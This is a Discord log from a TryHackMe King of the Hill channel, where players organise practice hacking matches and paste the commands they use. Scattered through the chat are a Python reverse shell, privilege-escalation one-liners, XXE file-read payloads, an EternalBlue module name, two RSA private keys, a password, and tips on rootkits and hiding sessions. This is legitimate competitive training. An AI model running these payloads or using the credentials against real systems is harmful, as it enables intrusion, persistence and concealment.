#koth-voice-chat
1 messages · Page 8 of 1
find / -name flag.txt 2>/dev/null
This is mega hard but fun
we were trying to put a funny cat in port 80
do you guys mind if I join your chat?
sure we dont mind
Anyone in KOTH have a VC rn?
gg everyone in last match!
look for partner on koth
u still looking?
try joint there bro
started in 14 minutes
5 minutes
lsattr
find / -perm -u=s -type f 2>/dev/null
another one
gg @trail wharf @covert dawn
ggs
GG
same, but trying to figure out mic
find / -perm -u=s -type f 2>/dev/null
is this a cat ?
dukrcrr9kv46nmeq21ufaqigf2
Can I join you guys? @sour oasis
ssh = 9585
ph2o1534i6je2hab5ru0o64ad4
Want to learn all about cyber-security and become an ethical hacker? Join this channel now to gain access into exclusive ethical hacking videos by clicking this link: https://www.youtube.com/channel/UC1szFCBUWXY3ESff8dJjjzw/join
Ethical Hacker | Penetration Tester | Cybersecurity Consultant
About The Trainer:
Loi Liang Yang
Certified Informati...
Invisibilty cloak: h@t4a06i3xw20@6u8dss6jcbn
ip netns exec jo /bin/sh -p
How'd you figure that out? @covert dawn
the zip?
or the prive esc
scp file neville@10.10.55.185:/home/neville
:wq!
wget http://$IP:port/file
ip netns exec jo /bin/sh -p
@sour oasis
@trail wharf
@John Hammond is going to teach us how to hack and stop being noobs.
**Subscribe to the official podcast channel: https://ntck.co/noobs
Listen on Spotify: https://open.spotify.com/show/5M6OGk2kqVcjVrUR4MPKoT
🔥🔥Become a Member!!: https://ntck.co/Premium 🔥🔥
☕☕ COFFEE and MERCH: https://ntck.co/coffee
smbclient \\tyler.thm\public
root❌0:0:root:/root:/bin/bash shutdown❌6:0:shutdown:/sbin:/sbin/shutdown halt❌7:0:halt:/sbin:/sbin/halt operator❌11:0:operator:/root:/sbin/nologin ftp❌14:50:FTP User:/var/ftp:/sbin/nologin systemd-network❌192:192:systemd Network Management:/:/sbin/nologin dbus❌81:81:System message bus:/:/sbin/nologin polkitd❌999:998:User for polkitd:/:/sbin/nologin sshd❌74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix❌89:89::/var/spool/postfix:/sbin/nologin tdurden❌1000:1000:Tyler Durden:/home/tdurden:/bin/bash apache❌48:48:Apache:/usr/share/httpd:/sbin/nologin narrator❌1002:1002::/home/narrator:/bin/bash tss❌59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin librenms❌996:993::/opt/librenms:/bin/bash librenms❌996:993::/opt/librenms:/bin/bash
smbclient \\\\tyler.thm\\public
tdurden
X8JEETQmf3hkS65f
smbclient \\\\tyler.thm\\public
find / -perm -u=s -type f 2>/dev/null
CMON one person share screen 😭
i will
Thanks, just trying to spec.
after i finish phone call
How long left in the match?
y'all doing some koth rn?
yep
oop, accidentally joined instead of spectating
either way, looks intense keep it up y'all
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA4Lpy4B/3/APWreOW3fccKDvGELOPcwBWjIqEtJkQNfSho8bI
FpxX1vqXKqtfQqJJXjIP4m0mCJNl6hvRDdZvWq2U7j73VIHyS9eSOK7CjKDpmqmD
+b4O1Mx0r6ORWnQ7DoI7Wrdp76i/hm4rzMh3GOMu2hQaPl57moA8SSVYJP1EykpD
zZXqKV3/N+UaKgeKRN7I060vq/jrLlvpJ8J7XgNz/3gF0c7gVfsy1r/ipo7+2ciJ
c8SDMHebX7WI1zhqaG5+Le5uKJl9WB1T8qSRj7+hd7etmOBsen0AWtFJsTUJpoia
tu7FzMIBrq3hnsHnWMip6JOJaPgFbDJCp+asBwIDAQABAoIBAQC1gyMiD/A2p8sQ
LJFAu0UM4iq6dq3Yz18YqRFC5ZaIXgzowbf/O0xfoYvTtRN+OKJV6M2Xr11W8+cP
TmRubtMGRMnUHRucMFFKHNZH3i/Zcmb8uwqT/4TvMCzXaKAQlWzV7S6PuTFhl8UK
iZXrE8fOXEENd8sysRHY2tbWpckqJbsd7BRgjK5WD/Ym81T8i8U8u9xs6b7I2KZD
H3HG/YzE39kCTpWpDJD7q7F9N8Qx/dNp8JdJTnUKnWXlGI4Y7iouc3OTPhlkrK+3
oWEsPHD8iwBGYtCvEbSiD/tciBmfMiWxaUpjq0oXY8/lssnU/AJimzgiDqymKGSX
Oie5/RERAoGBAPyBEPwS4mzoluBOuCs6y5J1+9Q3lyRRRDmEwJS0yACcy6yknrZv
Xn4zkGiEhrVFtE37GuIqstwAVGNNhIIAD2sKKDlZEOOcEwndU+Wn5MR5ELgjEkeq
idjuQ3FFyceAl1f0uiz3kxvu3XLYZDfSzzEIjFnqyBibp/X8DR0liRTDAoGBAOPW
8DQeyUbmbSCjRoHtSVOgQpm5ULp4fW4aDNJc1POhA/HdSwnhWYlzohnuNFWPCjvV
rFxw0ugJVGacxCD6U+sZ/6aAEZ/GsdvpR39OwWadPIMCUZ7BzfH2HZRSdiQXHt/r
05NNBZvx4tvrQRYKtpTuUFwdSzqwwTRl8l8RsodtAoGARGVRjHYxDv8Rn0CzckJC
0jFTPXCxaAz7RflHkQBHDKNsKB+PPit8lQKyox0CwCdZZ6YU6h5WxHDyatOciPor
MvtVWfNeN8kW/x0MlLCdrvp8JOSbFv6CyFgBvLUCqx+R3ylTJMsK9g4Fvg4PV2+q
38VI/zIxcTj4jhDwHG0GbLECgYEAtrp+oT6DrPJHWWK5vKBjK8efQozGuxbBehk4
aUp8m/xqHoOdmAn89mkf++34WRpEWeKvvt/ZtrEs2LMn9U7vGOIcEBwshlkj8jxw
1CCEqdi3XFbywQGsOz9pT7im+aD1aR9I651dP0nK6RgPdi8XafCL0KTJ3gM+oNiW
fzrBVS0CgYBsVTAcltl0KVp/DaGJ4ViOCB4bo5TYfFxRzonjQwGtwPi1xjZQ1/O+
neLKlc/V8TlDkf5/rYKchNvZKK4keeFK+8sjzBYW5vCPmMeG9BFbgqsOayQgnLEU
7LcXL2jnXY1grvsFjzXMd+5r7KSTajY5SBpXuzCJ4W71RouCDqdd8w==
-----END RSA PRIVATE KEY-----
chmod 600 id
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAsKHyvIOqmETYwUvLDAWg4ZXHb/oTgk7A4vkUY1AZC0S6fzNE
JmewL2ZJ6ioyCXhFmvlA7GC9iMJp13L5a6qeRiQEVwp6M5AYYsm/fTWXZuA2Qf4z
8o+cnnD+nswE9iLe5xPl9NvvyLANWNkn6cHkEOfQ1HYFMFP+85rmJ2o1upHkgcUI
ONDAnRigLz2IwJHeZAvllB5cszvmrLmgJWQg2DIvL/2s+J//rSEKyISmGVBxDdRm
T5ogSbSeJ9e+CfHtfOnUShWVaa2xIO49sKtu+s5LAgURtyX0MiB88NfXcUWC7uO0
Z1hd/W/rzlzKhvYlKPZON+J9ViJLNg36HqoLcwIDAQABAoIBABaM5n+Y07vS9lVf
RtIHGe4TAD5UkA8P3OJdaHPxcvEUWjcJJYc9r6mthnxF3NOGrmRFtDs5cpk2MOsX
u646PzC3QnKWXNmeaO6b0T28DNNOhr7QJHOwUA+OX4OIio2eEBUyXiZvueJGT73r
I4Rdg6+A2RF269yqrJ8PRJj9n1RtO4FPLsQ/5d6qxaHp543BMVFqYEWvrsdNU2Jl
VUAB652BcXpBuJALUV0iBsDxbqIKFl5wIsrTNWh+hkUTwo9HroQEVd4svCN+Jr5B
Npr81WG2jbKqOx2kJVFW/yCivmr/f/XokyOLBi4N/5Wqq+JuHD0zSPTtY5K04SUd
63TWQ5kCgYEA32IwfmDwGZBhqs3+QAH7y46ByIOa632DnZnFu2IqKySpTDk6chmh
ONSfc4coKwRq5T0zofHIKLYwO8vVpJq4iQ31r+oe7fAHh08w/mBC3ciCSi6EQdm5
RMxW0i4usAuneJ04rVmWWHepADB0BqYiByWtWFYAY9Kpks/ks9yWHn8CgYEAymxD
q3xvaWFycawJ+I/P5gW8+Wr1L3VrGbBRj1uPhNF0yQcA03ZjyyViDKeT/uBfCCxX
LPoLmoLYGmisl/MGq3T0g0TtrgvkFU6qZ3sjYJ+O/yrT06HYapJLv6Ns/+98uNvi
3VEQodZNII8P6WLk3RPp1NzDVcFDLmD9C40UAQ0CgYBokPgOUKZT8Sgm4mJ/5+3M
LZtHF4PvdEOmBJNw0dTXeUPesHNRcfnsNmulksEU0e6P/IQs7Jc7p30QoKwTb3Gu
hmBZxohP7So5BrLygHEMjI2g2AGFKbv2HokNvhyQwAPXDBG549Pi+bCcrBHEAwSu
v85TKX7pO3WxiauPHlUPVQKBgFmIF0ozKKgIpPDoMiTRnxfTc+kxyK6sFanwFbL9
wXXymuALi+78D1mb+Ek2mbwDC6V2zzwigJ1fwCu2Hpi6sjmF6lxhUWtI8SIHgFFy
4ovrJvlvvO9/R1SjzoM9yolNKPIut6JCJ8QdIFIFVPlad3XdR/CRkIhOieNqnKHO
TYnFAoGAbRrJYVZaJhVzgg7H22UM+sAuL6TR6hDLqD2wA1vnQvGk8qh95Mg9+M/X
6Zmia1R6Wfm2gIGirxK6s+XOpfqKncFmdjEqO+PHr4vaKSONKB0GzLI7ZlOPPU5V
Q2FZnCyRqaHlYUKWwZBt2UYbC46sfCWapormgwo3xA8Ix/jrBBI=
-----END RSA PRIVATE KEY-----
Oh, is room private
is this the king of the hill channel
cd /usr/bin
./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
./rustscan -a $IP -- -A
@glacial hinge
Anyone down for KOTH around 5PM PDT?
Anyone down for KOTH ?
while true; do echo "Glitchz21" > /root/king.txt ; done &
sudo git -p help config
!/bin/sh
./rustscan -a 10.10.111.177 -- -A
john --wordlist=rockyou.txt
find / -perm -u=s -type f 2>/dev/null
python -c "import pty; pty.spawn('/bin/bash')"
or
ruby -e "exec '/bin/bash'"
or
perl -e "exec '/bin/bash';"
then
Ctrl+Z
then
stty raw -echo && fg
then enter and write
export TERM=xterm-256-color
zip2john file > hash
./ip netns add foo
./ip netns exec foo /bin/sh -p
./ip netns delete foo
cat /etc/crontab
python3 -c "import pty; pty.spawn('/bin/bash')"
crtl Z
stty raw -echo && fg
export TERM=xterm-256-color
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.180.212",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
find / -perm -u=s -type f 2>/dev/null
niceeee
Downloads the netinstall or the live iso by torrent, http or ftp
Omg walidro new master of koth
zip2john application.zip
zip2john application.zip > hash
john hash
john hash --show
find / -perm -u=s -type f 2>/dev/null
I was asking who is good in networking
another one
Ohh
lol you find?
I don't believe in giving up easy lol
hehehe it's part of it, I didn't know anything about koth either until I got addicted
la divinia comedia,
I read the first book, on "heaven"
there were three right, heaven, purgatory and inferno,
the pictures were interesting mostly
not just that, all the devils/angels and different sinners projected in different places
Loved it
will check it out!
i want to report someone is deleting flags at the room
There's only 2 in spacejam, are you sure you didn't find them all?
oh, that sucks

Report them at koth@tryhackme.com (:
include the user profile & game id (the URL in your browser)
im pretty sure that gcc was installed on spacejam.. and now wasnt

or maybe im wrong
😄
Hi
is it just me, or is there no ssh on hackers anymore?
sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa
sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u
10072
ftp 10.10.225.18 port
Open 10.10.225.18:7373
Open 10.10.225.18:7811
Open 10.10.225.18:9130
Open 10.10.225.18:9999
Open 10.10.225.18:46291
ls -la
locate zip2john
/usr/sbin/zip2john .I_save > hash.hash
@next imp
@rigid ember 👍
y play well 💪 !
Thnx. U2
xD
ok, thnx
xD
See you next time. I am going to sleep.
Hackers
?! Me?!
yes you cutie 😘
hahaha
@split bloom I can if you're on
good game!
thank you very much, I took half of the game, I joined just for the fun
Thank you very much ! 🙂
Gave +1 Rep to @split bloom
You lost, didn't you? And now making excuses like joined late?
yes i lost
Didn't you join?
Nah, I'm too old for this shit 
you're amazing bro
I mean, the guys played 300koth games, after that much repetition, I guess it becomes smooth 🤷♂️
thanks
but this is all practice, i've been playing koth since the beginning of last year
i'll be able to beat you some day MathheuZ
I was thinking about doing a live stream playing koth with my friends
i'd watch you go through a koth
I honestly want to just create a script that fully roots the box and gets every flag as a POC, could be fun haha
Koth becomes boring for me cuz the rooms stay the same
and go, I trust that you will win me, just like everyone else, just train, and study, determination
Auto pawns 
The're not allowed
I'm talking to my friends, koth players from Brazil, to do a live playing with me
could you post you doing that on your youtube?
auto pwns is prohibited, results in permanent ban
It’s not for actual usage, just to test how well I can code haha, also like make it multithreaded
“as a POC”
the fun is to play and try to root or access in another way, and of course seeing friends with tails, or a shell vs shell, is much more fun
Sure bruh gib me when make
understand
I might even add defensive techniques haha
in my recent repository I put some defense techniques, but I didn't put much, just the basics, in a few days I'll put more things
I’ll star it, so I’ll have an idea where to start haha, btw what’s the extent of how much I can defend?
Yeh, I enjoyed the mount technique to evade the pty session killing, neat stuff
I'm creating a list of things I can put in the repository, to help when defending the machine
!docs koth

most koth machines have ssh, so you can defend ssh too
I’m pretty sure one of the rules is not use chattr binary
yes, i think it's cool too, especially nyancat, but i like to do it in private rooms, with my friends who also play koth here in brazil
Do it!

the rule is very clear, you can remove chattr only, the other binaries are not
because chattr, you can download it on your machine and compile it, and then send it to the box, and just give execution permission and run
simple
I wish they released more new machines, it would be really cool
Too simple cuz the opponent can do the same
Yeh, can't remember when they last released a new one
I think they are the same box as 2019
or 2020
i don't know why i started koth in 2021, in january or february
Yep, I think they've decided not to release more boxes so the're easier to manage or something
could be too, I really don't know
but for now, in koth i only have in mind to live stream, or record a video playing with my friends
and finish my shell vs shell repository, defense techniques in koth, etc
@sinful nestgood idea
yes
i can play with you if u want
i'm also a content creator but i had some problems with youtube copyrights and they closed my channel
i'm starting new one if uwanna collaborate there's alot of ideas in my mind
it's a good idea, my friends are brazilian, but i think it would be really cool
youtube always being annoying to people creating hacking content
ok, I'll set aside a day just for this
@sinful nest they can talk english we can have good time
take your time bro
yeah 🤦
Hi people, i seem to have a lot of trouble to understand the chattr. the common play is to user chattr and delete it. When i tried to upload the binarie corresponding to the OS. (Create a vm ubuntu 16.04 and copy it), it never work, always missing some librairies or thing like that. Do you have a hint or something to gave me a hint on what to search. Even if it ried to install the dependencies it never work. I am new too so please be kind hahaha. To be sure i dont want the anwser but a hint
@pastel terrace what works for me is downloading the following on your machine, move it over to the koth machine, compile it, then run it https://raw.githubusercontent.com/posborne/linux-programming-interface-exercises/master/15-file-attributes/chattr.c
@loud pecan 👍
hey @solid skiff, can I DM you?
No... 😉
🙃
everyone for koth
Had you for a second flint
I saw you used the watch command, I'm gonna start using that
There's better ||pspy||
Fun fact: mount -o remount,rw,hidepid=2 /proc will keep it from working for non-root users, just in case you want to keep your enemies from doing recon
--script=smb-vuln*
nmap -p 445 -script=smb-vuln-ms17-010.nse
@sinful nest Vá jogar caixa pública
why ?
@vapid storm serivce 9999 down ?
@sinful nest não, está tudo bem
my nick is on king for more than 10 minutes and it doesn't count points, I ran scan several times in the box and it didn't find any IP
lol
now gone
with samba you can get the flag too
I did try download flag.txt but was empty
lol
@royal gust
I used smbmap
hi can anyone help to find the directory of Nax room of THM. using gobuster but not getting error
gg
join, we are only 3, lol
can we reset, port 80 is down
ya
me seeing someone using window manager: ah I see you are a man of culture as well.
@vapid storm
ya bro @upper fog
Which one you using?
@royal gust check rules.
Just putting it out there, it is not allowed, but yes, I've seen the whole thing, so yeah, its an over game anyway.
30+ mins of King time + all flags is a KO.
Been a long time seeing people shouting over nyancat
it was fun
@charred patrol be ghosting oot there
@upper fog 
Why do you need to?
You can just compile on your local with --static and wget it on the target.
Word of advise, for KoTH, efficient backdoors are way more useful then rootkits.
na dude my rootkit can hide remote access
Ah, have used those, again, its an one hour thing, the whole rootkit is probably an overkill for this.
also, you can compile your rootkits statically too, have it ready for all boxes.
until niko kills your shell and puts nyancat on it 🤣
yhyh ima try that
Have you tried realllly persistent backdoors? Most people only kill with visible PIDs, that are based on either bash shells or pty sessions, both of which are easy to hide.
rootkit is better hides pid but also from netstat
all traffic is hidden
I think it hides user too
have to check it
Oh yeah, def. I usually go with the kick them off before they can see the traffic approach 
But, whatever works either way.
Also for the love of god if I can work my way around my schedule and finally release the box on hold, I can tell you, rootkits will not work on future KoTH boxes. Atleast those released by me.
Backdoor will be the only persistent approach then.
how so?
I am just gonna wink here 
we will see bout that haha
would love to play again soon. HMU LMK if you guys play.
yhyh I'll pm when we next play
you can if you download the relevant packages and transfer the .deb files to the machine
BUT to compile a rootkit you have to have the kernel headers installed too and honestly it's less effort to just install the target headers on your system than to install headers+entire toolchain on the target
problem is that different machines can have different kernel versions so you need to account for that
how would I copy the kernel headers to target system?
the rootkit I have use make so I prob need to install g++ .deb first I think
you usually get the target headers (they have to match the current running kernel) by installing the relevant package (on ubuntu it's linux-headers iirc)
and yes you'd need to install all the other utilities on the target too
that's why i said it's easier to just download the target headers onto your machine and compile it with those
few config tweaks required 🤷♂️
yeah its gonna take some tweaks for sure
@rigid ember, good game. 😎 👍
y played well
hope see y again🔥
Me too
Anyone down fro a game? starts in 11 minutes https://www.tryhackme.com/games/koth/41741#
First time playing KOTH
Hey @vapid storm I see you!
anyone down
hey all
cant talk right now 😄
just watching and listening to what you are doing
not creepily
very much creep
:' )
yeah thats the joke
oh
are they winning? :3
yeah very popular KOTH vc here haha
@_@
HIIII
O/
ssh? secure shell?
youre doing great @late acorn 😄
lol
@late acorn grats! and with such an audience too 😄
bye @arctic elm
bye!
👋
Bye bye
lots of noise on your mic @onyx aspen
he's a 0x1 so maybe new to this 🙂
there's a free kali
they've updated not too long ago
grats for getting king 🙂
thanks
yeah it was completely unplanned, just was showing that guy my screen bc he sounded interested then all of a sudden there was a full audience
are you sure
mandy is that you?
sorry I am not mandy :<
How are we doing?👀
wanna play/crush me?👀


May I hop in too?
ah okay
I mean, you guys can enumerate it 😄
ahem ddos
I could join another one if you two are playing

Ahh no, I had inserted some PHP code
That redirects somewhere on YouTube 😄

Really?
There's now about 100+ connections on the target machine, is that you?
uhh, i've just tried ffuf but killed it a while back
~~ Just found LFI ~~
my cursed notes are ruined/encrypted so I gave up
thought it'd be better to wait for a new game if you guys wan to?
I'm down, machine justr died to me anyways hahah
oh wait
nvm
I need to take doggo out
why are they encrypted?
I transferred them from windows to linux in a jacked usb, so either different filesystems messed them,
you can send to me and I'll try to recover, You want? ~~ I'm desperate for notes please say yes ~~
Windows to Linux, most of the time, messes my stuff

Yeh, same
My trick is, I don't take notes
Brain is the best note taker
and google is the best syntax finder
That wouldn't work for bigger pentests
just for you, 
also hacktricks took notes of literally everything
jesus that's alot
need to add a koth in there tho
what notes do you have on BINEX?
oh cool
The ones without > are empty, right?
yep
i mean, they don't have any sub-notes
the're just alone
https://tryhackme.com/games/koth/join/16706369f0df57e055252eb3
Starts in 10 mins
how can I join the voice channels?
verify with tryhackmebot first
!docs verify
Did you figure it out?
ty
anyone playing?
disco dancing
@solid skiff im stuck but i found your shell
might be the other guys though, cause i see another shell on port 82
it is from another guy
Starts in 10 mins if anyone wants to join.
https://tryhackme.com/games/koth/join/e7fdb7db0d7883140dc6e38b
are you able to portscan it?
ok now its working
why'd you reset
smh my head
the machine is dying
KoTH in a nutshell 
dang...I just deleted that....
forever online 😄
apparently in Windows you don't need quotes in echo sometext > file
Hi
someone doing KOTH ? I want to spectacle someone 😉
https://tryhackme.com/games/koth/join/fd75a20288f283675cfdfe62
starting in about 20 mins
Starting in <7 mins
https://tryhackme.com/games/koth/42481
Ooops, here's the real linkhttps://tryhackme.com/games/koth/join/b37f351343e0bd96e9a02ebb
https://tryhackme.com/games/koth/join/476d630fcb5c32df7d117bd6 20 mins till start
@cosmic lodge did you create a new user named aquinas or was that a regular user
half created. shell got killed before i could set the passwd, and then i needed to run anyway
Anyone for a koth ?
@solid skiff can you not destroy us thank you ahah
Gave +1 Rep to @solid skiff
starts in 30 mins, vc maybe if we have enough people?
I will slow down. I promise. 😎
@outer fjord @ripe kite @vapid storm
whats the issue?
@neon river i'm not exactly sure but when I tried to ssh into the koth machine it rejected me, even though an nmap scan showed the port was up with ssh
I did change the port but I don't think that should keep me from sshing into the machine unless I messed it up
🤷♂️
i'll experiment
I assume the boxes are the same when they boot up each time? or do they change. Like if you have played all of them you just know how to pwn it? I ask because I have tried playing KOTH a few times now and it always seem like someone is in like 2 min after the machine is up. Are they just that good?
I'm pretty sure they are the same
Some people take notes on them or already have flags for the machines
r u talking about LxCrack ??
Yes
Yeah i saw him too
and i often won the games
like he hack a machine in 5-6 min and then he become a king
he is insane
I am pretty sure he just has flags wrote down. He had 6 flags was in and hardened the machine in less the 5 min last game I as in with him.
yeah i'm watching him right now, in "OFFLINE" machine
I just confirmed the flags do stay in the same place. Because I got a machine that I had last night. I really don't have the skills to be trying KOTH any way but I was just thinking there is no way this guy is this good. lol
I had another guy do it last night also, but it was not that fast
yes, the flags are always in the same path
he just found 8 flags
He is just taking people souls lol.
Level 1 ya right....
on a windows machine too
maybe it's not his main account
Where's yours going?
or maybe he usually plays on another platform
oh no LxCrack have mercy on me
is LxCrack here ?
Lxcrack join the game
lmao I have never played this machine before, gonna get smoked
which machine ?
I put it on production
ow he just joined
Welp I am not going to get even one flag lol
Still going to try really hard
Hi guys
Ok so we know he is in discord now lol
yeah
What do u talking about
I wish I set the timer for the start shorter
here's a faster one, it starts in 5 mins
Guys sadly I can't join KoTH
There is always next time.
rip
on this new one
No probleme dude, maybe next tim
I am in
i have to reset my kali, i'll be back
That was fun
@vapid storm why did u delet the backups .sh ?
ggs
gg
@low tulip patched
who's AustinW?
me
oh damn
Plaintext English please ♥️
I was trying to figure out how to kick you while keeping mine lol but I had to have 2 term opend just to stop you from kicking me and locking me out
Ok sir
it was hard to manage lol
ya I think the one you didnt find was in the e-mail I am guessing
oh yeah
That was a load of fun I learned a lot.
I am down for sure I have some things to do now but later for sure
ok nice
Yup
Did you need root permissions to read it?
Yup
Damn
Hahaha
it takes me longer... lol
hi
gg
Gg
Yo
yo
guys r u here for a private KOTH ?
I could
join the voice chat
god meeping darn it so many missclicks to get into this channel just to read a few messages
what
shadow joined and left the general voice chat 5 times in a row to get into this channel
damn
<!DOCTYPE root [<!ENTITY read SYSTEM php://filter/convert.base64-encode/resource=../controllers/Api.php> ]>
<root><id>
&read;
</id></root>
<!DOCTYPE root [<!ENTITY read SYSTEM php://filter/convert.base64.encode/resource=../controllers/Api.php> ]>
<root><id>
&read;
</id></root>
sorry I can't talk much it's noisy here
working on it
bruuuuuuuuuuuuh 😎
what kind of koth event?
@formal terrace gg
ggs
I'm so dumb, I couldn't priv esc because I kept trying find as SUID and not as sudo
there is no need to priv esc, you just had to create a reverse shelll in port 3000 and then u will immediately get root access
The first , port 80, runs Apache whereas the second one, port 3000, runs Node.js.
a tournament
Oh that's actually sick
and in port 3000 telling us the cmd argument is missing… So we're facing a command injection ...
Why?
Yeah I wanna die I spent 20 mins reading and cracking Jordan's ssh key
I have no friends
But I'd be happy to participate if I can
feels bad
so why do you say that a koth tournament between friends is sick?
🤷♂️
Well sick like it's awesome
I understood
I'm still organizing the event with my friends,it will be on my server, several people will play
That's cool, I didn't realize a tournament was a possibility
I'm still new to this whole thing
let us know when its ready
I understand, I thought like this, if, for example, there are 40 or 30 people participating, it will be 4 or 3 rooms, then whoever wins advances to the next phase, until reaching the end
Ok
sss
yes
Anyone from current KOTH on?
@solid skiff you here buddy?
Now I am.
we are
@solid skiffhahahah stop man you played every room in koth stop playing it
Just two games and I going offline... 😉
Ready for KoTH?
starts in 15
starts in 5 mins
tmux -S /.dev/session
Hi guys
hi
hello
Barux what are you doing to make ssh unavailable
this is the second time I've gone against you and the second time ssh has become unavailable
he change the port
yeah I connected over the new port
it was 23000 something
the problem was that sometime in the middle of the match I was unable to connect and it's the second time it happened in all my koth games, and the second time it happened with baruX
I might just be stupid but I have never seen that before and I don't know if its allowed
and when I saw that you try to login in the new port I changed it again
changing ports it's allowed right
yeah changing ports is allowed, I do it
i'm not talking about the port changing i'm talking about ssh becoming unavailable
my b I accidentally took down apache
welcome
https://tryhackme.com/games/koth/43804 someone join up
You should send private invitation
baruX or tom.wilson here?
smasher are you also losing connectoin?
not even getting a ping
ok its good now
now it's down ):
.
B(

-unmute @dusty scarab Please don't ping everyone, bot doesn't like it and it's kinda rude
🔊 Unmuted R3TROX#8774
oh
sorry
@lime epoch in vc if u can
is there a spectate link?
Power cut out lol... I guess I'll be back in a bit
Might just tether my phone and laptop if it doesn't come back quick
Wonder how VPN does over mobile network tether 🤔
Don't think I'm gonna make it to this one, I'll come watch in a bit
sure
only a minute left
it doesn't let me join
it's too late btw u can join this https://tryhackme.com/games/koth/join/f9609e99446604129238123e
ok
yo guys
yo
@spiral karma
@low tulip any reason why you're posting random IP addresses please?
i asked @regal island for help for the CTF ,and i send him the IP of the box
I see, okay. Probably best to keep that to DMs please (:
Okey, sorry
People post random IPs that are usually dodgy or they want to recruit others to attack someone, so we're always a bit cautious about it is all
who needs to play one private KOTH?
@spiral karma check DM
Can i join?
you need to verify to join voice-chat.
Hello Feathers 👋
Hello!!
starts in 15 mins
gg Aquinas, now I know I have to turn off passwords in ssh
hmm?
whatcha mean
i typically use a reverse shell over ssh thing that essentually creates its own ssh server - neatly sidesteps all those people who peskily change ports, mess with ssh keys etc 😄
yeah but I added my own ssh keys to a few users, but forgot to change the sshd_config file to not ask for passwords
It doesn’t require the password if u submitted ur public key in the file named “authorized_keys” in the .ssh folder
Then why did it ask me for a password after I did that
I looked it up and there are a few options I need to set so it doesn't ask for a password
@sinful nest ik u might just be good but u pwned spacejam so fast it rly did look like an autopwn script
it just ruins the game ngl we all waited 25 mins for u to pwn it in less than 2 minutes
if i recall correctly those are illegal to use just so u know
no hate or nothing, just telling you
lol
how did u do it without an autopwn script loll u must type at lightspeed my man
I'm not using autopwn, spacejam is very simple, just inject a reverse shell and you already have it as root, then just protect
yeah hahah ik i have a writeup on it dont worry
wow, friendly
before you go around accusing, have evidence please, ok buddy?
and it's obvious that I'll know how to make the machine, I've played all the machines and I'm looking for the top 1
if your desire is to cause fights, I'm out friend, I don't waste my time with that
😄
i really said "looks like", i have a writeup and notes for this one and i still wouldnt have been able to go that fast still, ur just too good for the game ig, thats all i was saying, theres was no hate intended
i was lit saying ur good if this isnt an autopwn and u told me it wasnt
dont get mad at me for that like i dont waste my time with that either
I understand, I thought you were trying to insult me, sorry, it was a mistake on my part
I've been playing koth since 11 am, just so I can reach 400 wins
it's fine hahah it rly wasnt my intention im not that kind of person dw
hahahah keep it up friend thats awesome
wish i had that much time
u need a break :))
I understand, I'm really sorry friend, I also don't agree with the idea of using autopwn
I'm going to teach you how to defend yourself on linux machines soon, I'm going to put my repository on video
you won't tho, jcegnik's gonna come back when you're 5 games close 
dont be! i get why it could have been misunderstood sry lol
and yeah, me too, thats why im telling u cuz ive seen others do it
Thank you very much!! I don't have much time either, but since it's holidays now I have a little time, last year I played straight, but this year not so much anymore
Gave +1 Rep to @rigid mesa
great idea! i did this once on my website with ppl from my old team
that nothing, I don't stop until I hit 400 win hahaha
ohh okay i get it hahahah
tho i gotta stop talking ive got a box to pwn lolll
he is a very nice person, I like him, he is a person who can chat for hours
yeh, I've talked to him too, cool guy
I understand, it's ok, it's calm
I don't even have a team, but I would like to, it must be cool, I'm thinking of creating a website too, and posting things on it
it's all right
hahaha alright, good luck, enjoy!
and sorry for my bad english, i'm brazilian, i'm using the translator
im canadian french dww
thank you very much, we are with you! if you need help just call me
yeahh well look around for ppl here and you may find interested ppl
ill be fine but if u do sth cool defense-wise i may send you a dm im tryna up my defense skills hahah
thanks!
Yes, that's a good idea
hahahaha defense is the best part, it's also nice to see the others through the logs to know what they are doing
🙂
hahah ive never looked at the logs tho i should next time hehe
thanks for the tip
hahaha looking at the logs you can also know where they are trying to get shell or some entrypoint, so you just go quickly to the directory and correct the entrypoint
xD 🙂
what logs do you look at exactly? cuz i never did on any box
u can tell me after the game if u prefer its just out of curiosity
access.log, auth.log, nginx logs, ftp logs, and so on
oh okay so literally the services log alrightt thanks!
yes, we are together!
playing koth ?
yes
got room ?
yes, i will send you
ty : )
xD
usually in the morning and in the afternoon the koth is with more people
yes
i usually play in private
1v1
I play private games with my friends too, but we joke around in the living room, it's more to be distracted
3 minutes
who did I just kick out? lol
I think it was me, but it's ok, I have another session open without showing my pts
rootkit?
lol
no
ah alright
you can hide your PTS without rootkit
i had a friend that did that once he was like unbeatable
aight thanks for the heads up
Gave +1 Rep to @sinful nest
it's quite OP, because no one will know you're in the box
xD
i guess!
yes i made a script that hides your current PTS/process
but there's another way to hide your PTS too, it's much more OP for me
if you use mount to hide pts, whoever runs mount will be where your process was mounted, so just use umount
mount -o bind /dev/null /dev/pts/8 just used that, seems to work
true
and then just use umount, but if you take the permission of others to use mount and umount is also OP
but there are also other techniques that you can hide the process and pts, and in my opinion I think it's more OP, because mount has this weakness, but even so it's also OP to use mount for hidden process
thanks man!
what?
it died for a moment
I understand, so it wasn't my vpn
smbclient -L \\\\10.10.214.183\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
HouseKeys Disk
IPC$ IPC Remote IPC
King Disk A script to pull king from the server
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.214.183 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
smbclient -H //10.10.214.183/NETLOGON
windows/smb/ms17_010_eternalblue
@hollow zephyr , nice... 😉
nice game
GG



